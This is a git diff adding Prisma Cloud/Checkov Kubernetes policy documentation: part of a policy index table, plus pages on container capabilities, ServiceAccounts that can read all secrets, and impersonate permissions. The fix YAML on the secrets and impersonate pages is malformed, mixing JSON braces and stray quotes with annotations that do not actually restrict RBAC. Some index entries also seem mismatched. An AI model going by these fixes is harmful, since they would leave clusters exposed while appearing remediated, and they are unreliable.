https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/ImageDigest.py[CKV_K8S_43] +|LOW + + +|xref:bc-k8s-4.adoc[Containers wishing to share host network namespace admitted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespacePSP.py[CKV_K8S_4] +|MEDIUM + + +|xref:bc-k8s-40.adoc[Tiller (Helm V2) deployment is accessible from within the cluster] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py[CKV_K8S_45] +|LOW + + +|xref:bc-k8s-41.adoc[Tiller (Helm v2) service is not deleted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/TillerService.py[CKV_K8S_44] +|LOW + + +|xref:bc-k8s-5.adoc[Root containers admitted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py[CKV_K8S_6] +|MEDIUM + + +|xref:bc-k8s-6.adoc[Containers with NET_RAW capability admitted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py[CKV_K8S_7] +|LOW + + +|xref:bc-k8s-7.adoc[Liveness probe is not configured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py[CKV_K8S_8] +|LOW + + +|xref:bc-k8s-8.adoc[Readiness probe is not configured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py[CKV_K8S_9] +|LOW + + +|xref:bc-k8s-9.adoc[CPU request is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/CPURequests.py[CKV_K8S_10] +|LOW + + +|xref:ensure-clusterroles-that-grant-control-over-validating-or-mutating-admission-webhook-configurations-are-minimized.adoc[Kubernetes ClusterRoles that grant control over validating or mutating admission webhook configurations are not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacControlWebhooks.py[CKV_K8S_155] +|HIGH + + +|xref:ensure-clusterroles-that-grant-permissions-to-approve-certificatesigningrequests-are-minimized.adoc[Kubernetes ClusterRoles that grant permissions to approve CertificateSigningRequests are not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacApproveCertificateSigningRequests.py[CKV_K8S_156] +|HIGH + + +|xref:ensure-containers-do-not-run-with-allowprivilegeescalation.adoc[Containers run with AllowPrivilegeEscalation based on Pod Security Policy setting] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalationPSP.py[CKV_K8S_5] +|MEDIUM + + +|xref:ensure-default-service-accounts-are-not-actively-used.adoc[Default Kubernetes service accounts are actively used by bounding to a role or cluster role] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py[CKV_K8S_42] +|LOW + + +|xref:ensure-minimized-wildcard-use-in-roles-and-clusterroles.adoc[Wildcard use is not minimized in Roles and ClusterRoles] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py[CKV_K8S_49] +|MEDIUM + + +|xref:ensure-roles-and-clusterroles-that-grant-permissions-to-bind-rolebindings-or-clusterrolebindings-are-minimized.adoc[Kubernetes Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings are not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py[CKV_K8S_157] +|MEDIUM + + +|xref:ensure-roles-and-clusterroles-that-grant-permissions-to-escalate-roles-or-clusterrole-are-minimized.adoc[Kubernetes Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRole are not minimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py[CKV_K8S_158] +|MEDIUM + + +|xref:ensure-securitycontext-is-applied-to-pods-and-containers.adoc[securityContext is not applied to pods and containers] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py[CKV_K8S_29] +|LOW + + +|xref:ensure-that-the-admission-control-plugin-alwaysadmit-is-not-set.adoc[The admission control plugin AlwaysAdmit is set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py[CKV_K8S_79] +|MEDIUM + + +|xref:ensure-that-the-admission-control-plugin-alwayspullimages-is-set.adoc[The admission control plugin AlwaysPullImages is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py[CKV_K8S_80] +|MEDIUM + + +|xref:ensure-that-the-admission-control-plugin-eventratelimit-is-set.adoc[The admission control plugin EventRateLimit is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlEventRateLimit.py[CKV_K8S_78] +|MEDIUM + + +|xref:ensure-that-the-admission-control-plugin-namespacelifecycle-is-set.adoc[The admission control plugin NamespaceLifecycle is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py[CKV_K8S_83] +|LOW + + +|xref:ensure-that-the-admission-control-plugin-noderestriction-is-set.adoc[The admission control plugin NodeRestriction is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py[CKV_K8S_85] +|MEDIUM + + +|xref:ensure-that-the-admission-control-plugin-podsecuritypolicy-is-set.adoc[The admission control plugin PodSecurityPolicy is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py[CKV_K8S_84] +|LOW + + +|xref:ensure-that-the-admission-control-plugin-securitycontextdeny-is-set-if-podsecuritypolicy-is-not-used.adoc[The admission control plugin SecurityContextDeny is set if PodSecurityPolicy is used] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py[CKV_K8S_81] +|LOW + + +|xref:ensure-that-the-admission-control-plugin-serviceaccount-is-set.adoc[The admission control plugin ServiceAccount is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py[CKV_K8S_82] +|LOW + + +|xref:ensure-that-the-anonymous-auth-argument-is-set-to-false-1.adoc[The --anonymous-auth argument is not set to False for API server] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py[CKV_K8S_68] +|LOW + + +|xref:ensure-that-the-anonymous-auth-argument-is-set-to-false.adoc[The --anonymous-auth argument is not set to False for Kubelet] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py[CKV_K8S_138] +|MEDIUM + + +|xref:ensure-that-the-api-server-only-makes-use-of-strong-cryptographic-ciphers.adoc[The API server does not make use of strong cryptographic ciphers] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py[CKV_K8S_105] +|HIGH + + +|xref:ensure-that-the-audit-log-maxage-argument-is-set-to-30-or-as-appropriate.adoc[The --audit-log-maxage argument is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py[CKV_K8S_92] +|LOW + + +|xref:ensure-that-the-audit-log-maxbackup-argument-is-set-to-10-or-as-appropriate.adoc[The --audit-log-maxbackup argument is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py[CKV_K8S_93] +|LOW + + +|xref:ensure-that-the-audit-log-maxsize-argument-is-set-to-100-or-as-appropriate.adoc[The --audit-log-maxsize argument is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py[CKV_K8S_94] +|LOW + + +|xref:ensure-that-the-audit-log-path-argument-is-set.adoc[The --audit-log-path argument is not set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py[CKV_K8S_91] +|MEDIUM + + +|xref:ensure-that-the-authorization-mode-argument-includes-node.adoc[The --authorization-mode argument does not include node] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py[CKV_K8S_75] +|MEDIUM + + +|xref:ensure-that-the-authorization-mode-argument-includes-rbac.adoc[The --authorization-mode argument does not include RBAC] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py[CKV_K8S_77] +|LOW + + +|xref:ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow-1.adoc[The --authorization-mode argument is set to AlwaysAllow for Kubelet] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py[CKV_K8S_74] +|MEDIUM + + +|xref:ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow.adoc[The --authorization-mode argument is set to AlwaysAllow for API server] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py[CKV_K8S_139] +|LOW + + +|xref:ensure-that-the-auto-tls-argument-is-not-set-to-true.adoc[The --auto-tls argument is set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py[CKV_K8S_118] +|HIGH + + +|xref:ensure-that-the-basic-auth-file-argument-is-not-set.adoc[The --basic-auth-file argument is Set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py[CKV_K8S_69] +|LOW + + +|xref:ensure-that-the-bind-address-argument-is-set-to-127001-1.adoc[The --bind-address argument is not set to 127.0.0.1] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py[CKV_K8S_115] +|HIGH + + +|xref:ensure-that-the-bind-address-argument-is-set-to-127001.adoc[The --bind-address argument for controller managers is not set to 127.0.0.1] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py[CKV_K8S_113] +|HIGH + + +|xref:ensure-that-the-cert-file-and-key-file-arguments-are-set-as-appropriate.adoc[The --cert-file and --key-file arguments are not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py[CKV_K8S_116] +|HIGH + + +|xref:ensure-that-the-client-ca-file-argument-is-set-as-appropriate-scored.adoc[The --client-ca-file argument for API Servers is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py[CKV_K8S_140] +|LOW + + +|xref:ensure-that-the-client-cert-auth-argument-is-set-to-true.adoc[The --client-cert-auth argument is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py[CKV_K8S_117] +|MEDIUM + + +|xref:ensure-that-the-etcd-cafile-argument-is-set-as-appropriate-1.adoc[The --etcd-cafile argument is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py[CKV_K8S_102] +|HIGH + + +|xref:ensure-that-the-etcd-cafile-argument-is-set-as-appropriate.adoc[Encryption providers are not appropriately configured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py[CKV_K8S_104] +|HIGH + + +|xref:ensure-that-the-etcd-certfile-and-etcd-keyfile-arguments-are-set-as-appropriate.adoc[The --etcd-certfile and --etcd-keyfile arguments are not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py[CKV_K8S_99] +|HIGH + + +|xref:ensure-that-the-event-qps-argument-is-set-to-0-or-a-level-which-ensures-appropriate-event-capture.adoc[The --event-qps argument is not set to a level that ensures appropriate event capture] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py[CKV_K8S_147] +|LOW + + +|xref:ensure-that-the-hostname-override-argument-is-not-set.adoc[The --hostname-override argument is set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py[CKV_K8S_146] +|LOW + + +|xref:ensure-that-the-insecure-bind-address-argument-is-not-set.adoc[The --insecure-bind-address argument is set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py[CKV_K8S_86] +|HIGH + + +|xref:ensure-that-the-insecure-port-argument-is-set-to-0.adoc[The --insecure-port argument is not set to 0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py[CKV_K8S_88] +|HIGH + + +|xref:ensure-that-the-kubelet-certificate-authority-argument-is-set-as-appropriate.adoc[The --kubelet-certificate-authority argument is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py[CKV_K8S_73] +|HIGH + + +|xref:ensure-that-the-kubelet-client-certificate-and-kubelet-client-key-arguments-are-set-as-appropriate.adoc[The --kubelet-client-certificate and --kubelet-client-key arguments are not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py[CKV_K8S_72] +|HIGH + + +|xref:ensure-that-the-kubelet-https-argument-is-set-to-true.adoc[The --kubelet-https argument is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py[CKV_K8S_71] +|HIGH + + +|xref:ensure-that-the-kubelet-only-makes-use-of-strong-cryptographic-ciphers.adoc[Kubelet does not use strong cryptographic ciphers] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py[CKV_K8S_151] +|LOW + + +|xref:ensure-that-the-make-iptables-util-chains-argument-is-set-to-true.adoc[The --make-iptables-util-chains argument is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py[CKV_K8S_145] +|LOW + + +|xref:ensure-that-the-peer-cert-file-and-peer-key-file-arguments-are-set-as-appropriate.adoc[The --peer-cert-file and --peer-key-file arguments are not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py[CKV_K8S_119] +|HIGH + + +|xref:ensure-that-the-peer-client-cert-auth-argument-is-set-to-true.adoc[The --peer-client-cert-auth argument is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/PeerClientCertAuthTrue.py[CKV_K8S_121] +|HIGH + + +|xref:ensure-that-the-profiling-argument-is-set-to-false-1.adoc[The --profiling argument is not set to False for scheduler] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py[CKV_K8S_114] +|LOW + + +|xref:ensure-that-the-profiling-argument-is-set-to-false-2.adoc[The --profiling argument is not set to false for API server] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py[CKV_K8S_90] +|LOW + + +|xref:ensure-that-the-profiling-argument-is-set-to-false.adoc[The --profiling argument for controller managers is not set to False] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py[CKV_K8S_107] +|MEDIUM + + +|xref:ensure-that-the-protect-kernel-defaults-argument-is-set-to-true.adoc[The --protect-kernel-defaults argument is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py[CKV_K8S_144] +|LOW + + +|xref:ensure-that-the-read-only-port-argument-is-set-to-0.adoc[The --read-only-port argument is not set to 0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py[CKV_K8S_141] +|LOW + + +|xref:ensure-that-the-request-timeout-argument-is-set-as-appropriate.adoc[The --request-timeout argument is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py[CKV_K8S_95] +|MEDIUM + + +|xref:ensure-that-the-root-ca-file-argument-is-set-as-appropriate.adoc[The --root-ca-file argument for controller managers is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py[CKV_K8S_111] +|HIGH + + +|xref:ensure-that-the-rotate-certificates-argument-is-not-set-to-false.adoc[The --rotate-certificates argument is set to false] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py[CKV_K8S_149] +|HIGH + + +|xref:ensure-that-the-rotatekubeletservercertificate-argument-is-set-to-true-for-controller-manager.adoc[The RotateKubeletServerCertificate argument for controller managers is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py[CKV_K8S_112] +|MEDIUM + + +|xref:ensure-that-the-secure-port-argument-is-not-set-to-0.adoc[The --secure-port argument is set to 0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py[CKV_K8S_89] +|LOW + + +|xref:ensure-that-the-service-account-key-file-argument-is-set-as-appropriate.adoc[The --service-account-key-file argument is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py[CKV_K8S_97] +|MEDIUM + + +|xref:ensure-that-the-service-account-lookup-argument-is-set-to-true.adoc[The --service-account-lookup argument is not set to true] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py[CKV_K8S_96] +|HIGH + + +|xref:ensure-that-the-service-account-private-key-file-argument-is-set-as-appropriate.adoc[The --service-account-private-key-file argument for controller managers is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py[CKV_K8S_110] +|HIGH + + +|xref:ensure-that-the-streaming-connection-idle-timeout-argument-is-not-set-to-0.adoc[The --streaming-connection-idle-timeout argument is set to 0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py[CKV_K8S_143] +|LOW + + +|xref:ensure-that-the-terminated-pod-gc-threshold-argument-is-set-as-appropriate.adoc[The --terminated-pod-gc-threshold argument for controller managers is not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py[CKV_K8S_106] +|MEDIUM + + +|xref:ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate-for-kubelet.adoc[The --tls-cert-file and --tls-private-key-file arguments for Kubelet are not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py[CKV_K8S_148] +|HIGH + + +|xref:ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate.adoc[The --tls-cert-file and --tls-private-key-file arguments for API server are not set appropriately] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py[CKV_K8S_100] +|HIGH + + +|xref:ensure-that-the-token-auth-file-parameter-is-not-set.adoc[The --token-auth-file argument is Set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py[CKV_K8S_70] +|LOW + + +|xref:ensure-that-the-use-service-account-credentials-argument-is-set-to-true.adoc[The --use-service-account-credentials argument for controller managers is not set to True] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py[CKV_K8S_108] +|HIGH + +|xref:granting-create-permissions-to-nodesproxy-or-podsexec-sub-resources-allows-potential-privilege-escalation.adoc[Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml[CKV2_K8S_2] +|HIGH + + +|xref:minimize-the-admission-of-containers-with-capabilities-assigned.adoc[Admission of containers with capabilities assigned is not minimised] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py[CKV_K8S_36] +|LOW + + +|xref:no-serviceaccountnode-should-be-able-to-read-all-secrets.adoc[No ServiceAccount/Node should be able to read all secrets] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml[CKV2_K8S_5] +|HIGH + + +|xref:no-serviceaccountnode-should-have-impersonate-permissions-for-groupsusersservice-accounts.adoc[No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml[CKV2_K8S_3] +|HIGH + + +|xref:prevent-all-nginx-ingress-annotation-snippets.adoc[NGINX Ingress has annotation snippets] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742AllSnippets.py[CKV_K8S_153] +|LOW + + +|xref:prevent-nginx-ingress-annotation-snippets-which-contain-alias-statements.adoc[NGINX Ingress has annotation snippets which contain alias statements] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Alias.py[CKV_K8S_154] +|LOW + + +|xref:prevent-nginx-ingress-annotation-snippets-which-contain-lua-code-execution.adoc[NGINX Ingress annotation snippets contains LUA code execution] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Lua.py[CKV_K8S_152] +|LOW + + +|xref:rolebinding-should-not-allow-privilege-escalation-to-a-serviceaccount-or-node-on-other-rolebinding.adoc[RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml[CKV2_K8S_1] +|HIGH + + +|xref:serviceaccounts-and-nodes-that-can-modify-servicesstatus-may-set-the-statusloadbalanceringressip-field-to-exploit-the-unfixed-cve-2020-8554-and-launch-mitm-attacks-against-the-cluster.adoc[ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml[CKV2_K8S_4] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/minimize-the-admission-of-containers-with-capabilities-assigned.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/minimize-the-admission-of-containers-with-capabilities-assigned.adoc new file mode 100644 index 000000000..3ac1b61ea --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/minimize-the-admission-of-containers-with-capabilities-assigned.adoc @@ -0,0 +1,64 @@ +== Admission of containers with capabilities assigned is not minimised +// Admission of containers with capabilities assigned not minimized + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b1c9494c-3caa-497e-950f-4692e5d9fa79 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py[CKV_K8S_36] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Terraform,Helm,Kustomize + +|=== + + + +=== Description + + +Docker has a default list of capabilities that are allowed for each container of a pod. +The containers use the capabilities from this default list, but pod manifest authors can alter it by requesting additional capabilities, or dropping some of the default capabilities. +Limiting the admission of containers with capabilities ensures that only a small number of containers have extended capabilities outside the default range. +This helps ensure that if a container becomes compromised it is unable to provide a productive path for an attacker to move laterally to other containers in the pod. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* securityContext:capabilities:drop (Optional) + +Capabilities field allows granting certain privileges to a process without granting all the privileges of the root user. +when *drop* includes *ALL*, all of the root privileges are disabled for that container. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: + capabilities: + drop: ++ - ALL +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-be-able-to-read-all-secrets.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-be-able-to-read-all-secrets.adoc new file mode 100644 index 000000000..c435a183e --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-be-able-to-read-all-secrets.adoc @@ -0,0 +1,54 @@ +== No ServiceAccount/Node should be able to read all secrets +// ServiceAccounts and Nodes should not be able to read all secrets + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 68c3a96c-84d7-43c0-8a6a-7eacecac27d2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml[CKV2_K8S_5] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, a ServiceAccount is an account that is associated with a specific service. +A ServiceAccount can be granted specific permissions, known as "roles," that determine what actions it is allowed to perform within a Kubernetes cluster. +One potential issue with ServiceAccounts is that they could potentially be granted the ability to read all secrets in a Kubernetes cluster. +This would allow the ServiceAccount to access sensitive information such as passwords, API keys, and other sensitive data that is stored as secrets in the cluster. +Allowing a ServiceAccount to read all secrets could pose a security risk to the cluster, as it could potentially allow unauthorized access to sensitive information. +Therefore, it is generally best to avoid granting ServiceAccounts the ability to read all secrets in a cluster. +It is also important to note that nodes, which are the physical or virtual machines that run the Kubernetes cluster, can also potentially be granted the ability to read all secrets. +Therefore, it is also important to ensure that nodes do not have this ability to prevent potential unauthorized access to sensitive information. + +=== Fix - Buildtime + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: ServiceAccount +metadata: + name: my-service-account + annotations: + authorization.k8s.io/get: "[]"", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-have-impersonate-permissions-for-groupsusersservice-accounts.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-have-impersonate-permissions-for-groupsusersservice-accounts.adoc new file mode 100644 index 000000000..6747ffb14 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/no-serviceaccountnode-should-have-impersonate-permissions-for-groupsusersservice-accounts.adoc @@ -0,0 +1,52 @@ +== No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts +// ServiceAccounts and Nodes should not have `impersonate` permissions for groups/users/service-accounts + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4a7f5715-3c2a-457c-a5f8-b905d78b2943 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml[CKV2_K8S_3] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, the impersonate permission allows a user or service account to perform actions as if they were another user or service account. +This can be useful in certain situations, such as when one service needs to access another service on behalf of a user. +However, allowing a ServiceAccount or Node to have impersonate permissions for other users or service accounts can potentially allow privilege escalation. +This is because ServiceAccounts and Nodes are not typically associated with individual users, so granting them the ability to impersonate other users could potentially allow any user who is able to access the ServiceAccount or Node to gain the privileges of the impersonated user. +For example, if a ServiceAccount has the impersonate permission for a user who has admin privileges, any user who is able to access the ServiceAccount would be able to perform actions as if they were an admin user. +This could lead to unauthorized access to sensitive information or the ability to perform unauthorized actions, so it is generally best to avoid granting impersonate permissions to ServiceAccounts and Nodes. + +=== Fix - Buildtime + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: ServiceAccount +metadata: + name: my-service-account + annotations: + authorization.k8s.io/impersonate: "false"", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-all-nginx-ingress-annotation-snippets.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/prevent-all-nginx-ingress-annotation-snippets.adoc new file mode 100644 index 000000000..cca31be77 --- /dev/null +++ 